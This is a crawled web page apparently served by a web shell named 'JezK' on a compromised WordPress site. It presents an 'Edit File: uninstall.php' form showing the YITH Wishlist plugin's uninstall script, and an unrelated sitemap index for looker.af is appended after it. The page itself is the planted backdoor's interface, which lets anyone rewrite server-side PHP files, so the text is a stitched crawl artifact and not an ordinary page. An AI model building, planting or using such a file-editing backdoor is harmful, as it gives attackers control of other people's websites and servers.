
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: uninstall.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
/**
 * Uninstall plugin
 *
 * @author YITH &lt;plugins@yithemes.com&gt;
 * @package YITH\Wishlist
 * @version 2.0.16
 */

// If uninstall not called from WordPress exit.
if ( ! defined( &#039;WP_UNINSTALL_PLUGIN&#039; ) ) {
	exit;
}

/**
 * Uninstall completely wishlist from the site
 *
 * @return void
 * @since 3.0.0
 */
function yith_wcwl_uninstall() {
	global $wpdb;

	if ( defined( &#039;YITH_WCWL_REMOVE_ALL_DATA&#039; ) &amp;&amp; true === YITH_WCWL_REMOVE_ALL_DATA &amp;&amp; ! defined( &#039;YITH_WCWL_PREMIUM&#039; ) ) {
		// define local private attribute.
		$wpdb-&gt;yith_wcwl_items     = $wpdb-&gt;prefix . &#039;yith_wcwl&#039;;
		$wpdb-&gt;yith_wcwl_wishlists = $wpdb-&gt;prefix . &#039;yith_wcwl_lists&#039;;

		// Delete option from options table.
		delete_option( &#039;yith_wcwl_version&#039; );
		delete_option( &#039;yith_wcwl_db_version&#039; );
		$wpdb-&gt;query( $wpdb-&gt;prepare( &quot;DELETE FROM {$wpdb-&gt;options} WHERE option_name LIKE %s&quot;, &#039;yith_wcwl_%&#039; ) ); // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching

		// delete pages created for this plugin.
		wp_delete_post( get_option( &#039;yith-wcwl-pageid&#039; ), true );

		// remove any additional options and custom table.
		// phpcs:disable WordPress.DB.DirectDatabaseQuery, WordPress.DB.PreparedSQL.NotPrepared
		$sql = &quot;DROP TABLE IF EXISTS `{$wpdb-&gt;yith_wcwl_items}`&quot;;
		$wpdb-&gt;query( $sql );
		$sql = &quot;DROP TABLE IF EXISTS `{$wpdb-&gt;yith_wcwl_wishlists}`&quot;;
		$wpdb-&gt;query( $sql );
		// phpcs:enable WordPress.DB.DirectDatabaseQuery, WordPress.DB.PreparedSQL.NotPrepared
	}
}

if ( ! is_multisite() ) {
	yith_wcwl_uninstall();
} else {
	global $wpdb;
	$blog_ids         = $wpdb-&gt;get_col( &quot;SELECT blog_id FROM {$wpdb-&gt;blogs}&quot; ); // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching
	$original_blog_id = get_current_blog_id();

	foreach ( $blog_ids as $blog_to_process ) {
		switch_to_blog( $blog_to_process );
		yith_wcwl_uninstall();
	}

	switch_to_blog( $original_blog_id );
}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
